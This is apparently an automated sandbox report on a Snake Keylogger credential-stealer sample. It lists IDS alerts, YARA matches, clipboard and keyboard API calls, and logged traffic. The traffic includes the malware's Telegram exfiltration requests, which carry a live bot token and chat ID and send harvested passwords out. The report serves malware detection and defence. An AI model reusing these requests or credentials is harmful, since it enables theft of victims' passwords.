Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 056F0A1Ah	8_2_056F05F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 056FE868h	8_2_056FE5C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 056FD708h	8_2_056FD460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 056FBA09h	8_2_056FB760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 056F0A1Ah	8_2_056F0600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 056FE410h	8_2_056FE168
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 056F02F1h	8_2_056F0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 056FB5B1h	8_2_056FB308
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 056FDFB8h	8_2_056FDD10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 056FB159h	8_2_056FAEB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 056F0A1Ah	8_2_056F0947
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 056FDB60h	8_2_056FD8B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 056FBE61h	8_2_056FBBB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 056FAD01h	8_2_056FAA58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 056FECC0h	8_2_056FEA18

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.12:49714 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.12:49714 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.12:49722 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.12:49722 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7913474358:AAGbk3vpVDyjWuynj6-s1PXT2BxohDfzNdA/sendDocument?chat_id=7804810800&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3173a1bf16abHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7913474358:AAGbk3vpVDyjWuynj6-s1PXT2BxohDfzNdA/sendDocument?chat_id=7804810800&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3173a990a4cfHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.64.1 104.21.64.1
Source: Joe Sandbox View	IP Address: 104.21.64.1 104.21.64.1

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.12:49712 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.12:49720 -> 132.226.247.73:80

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.12:49713 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.12:49721 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\eLo1khn7DQ.exe

Code function: 0_2_0026CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,

0_2_0026CE44

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot7913474358:AAGbk3vpVDyjWuynj6-s1PXT2BxohDfzNdA/sendDocument?chat_id=7804810800&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3173a1bf16abHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive

Source: RegSvcs.exe, 00000003.00000002.4818118474.0000000002BDE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4818140567.0000000002EAE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: RegSvcs.exe, 00000003.00000002.4818118474.0000000002B03000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4818140567.0000000002DD3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: RegSvcs.exe, 00000003.00000002.4818118474.0000000002BDE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4818118474.0000000002AF7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4818118474.0000000002B03000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4818140567.0000000002DD3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4818140567.0000000002DC7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4818140567.0000000002EAE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000003.00000002.4818118474.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4818140567.0000000002D51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: lustring.exe, 00000002.00000002.2407127647.0000000001390000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4816616271.0000000000403000.00000040.80000000.00040000.00000000.sdmp, lustring.exe, 00000007.00000002.2545717519.00000000021B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: RegSvcs.exe, 00000003.00000002.4818118474.0000000002B25000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4818140567.0000000002DF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: RegSvcs.exe, 00000003.00000002.4818118474.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4818140567.0000000002DA3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 00000003.00000002.4818118474.0000000002BDE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4818140567.0000000002EAE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: RegSvcs.exe, 00000003.00000002.4818118474.0000000002BDE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4818140567.0000000002EAE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: lustring.exe, 00000002.00000002.2407127647.0000000001390000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4816616271.0000000000403000.00000040.80000000.00040000.00000000.sdmp, lustring.exe, 00000007.00000002.2545717519.00000000021B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: RegSvcs.exe, 00000008.00000002.4818140567.0000000002EAE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7913474358:AAGbk3vpVDyjWuynj6-s1PXT2BxohDfzNdA/sendDocument?chat_id=7804
Source: RegSvcs.exe, 00000003.00000002.4818118474.0000000002B03000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4818140567.0000000002DD3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: lustring.exe, 00000002.00000002.2407127647.0000000001390000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4816616271.0000000000403000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4818118474.0000000002B03000.00000004.00000800.00020000.00000000.sdmp, lustring.exe, 00000007.00000002.2545717519.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4818140567.0000000002DD3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 00000008.00000002.4818140567.0000000002DD3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: RegSvcs.exe, 00000003.00000002.4818118474.0000000002B03000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4818140567.0000000002DD3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189x

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.12:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.12:49722 version: TLS 1.2

Source: C:\Users\user\Desktop\eLo1khn7DQ.exe

Code function: 0_2_0026EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_0026EAFF

Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_0026ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		0_2_0026ED6A
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_0015ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		2_2_0015ED6A

Source: C:\Users\user\Desktop\eLo1khn7DQ.exe

0_2_0026EAFF

Source: C:\Users\user\Desktop\eLo1khn7DQ.exe

Code function: 0_2_0025AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

0_2_0025AA57

Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_00289576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		0_2_00289576
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_00179576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		2_2_00179576

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.lustring.exe.21b0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.lustring.exe.21b0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.lustring.exe.21b0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.lustring.exe.21b0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.lustring.exe.1390000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.lustring.exe.1390000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.lustring.exe.1390000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.lustring.exe.1390000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000002.00000002.2407127647.0000000001390000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000002.00000002.2407127647.0000000001390000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000003.00000002.4816616271.0000000000403000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000007.00000002.2545717519.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000007.00000002.2545717519.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: Process Memory Space: lustring.exe PID: 7164, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 6180, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: lustring.exe PID: 5636, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Binary is likely a compiled AutoIt script file

Source: eLo1khn7DQ.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: eLo1khn7DQ.exe, 00000000.00000003.2382051345.0000000003461000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_ec53f3ef-a
Source: eLo1khn7DQ.exe, 00000000.00000003.2382051345.0000000003461000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_11217353-b
Source: eLo1khn7DQ.exe, 00000000.00000000.2346079272.00000000002B2000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_a023f2d2-1
Source: eLo1khn7DQ.exe, 00000000.00000000.2346079272.00000000002B2000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_16dd8180-4
Source: lustring.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: lustring.exe, 00000002.00000000.2382381557.00000000001A2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_6364f14e-1
Source: lustring.exe, 00000002.00000000.2382381557.00000000001A2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_295ae88c-4
Source: lustring.exe, 00000007.00000000.2515954631.00000000001A2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_b2fa2017-f
Source: lustring.exe, 00000007.00000000.2515954631.00000000001A2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_dca8c010-5
Source: eLo1khn7DQ.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_57db10c1-f
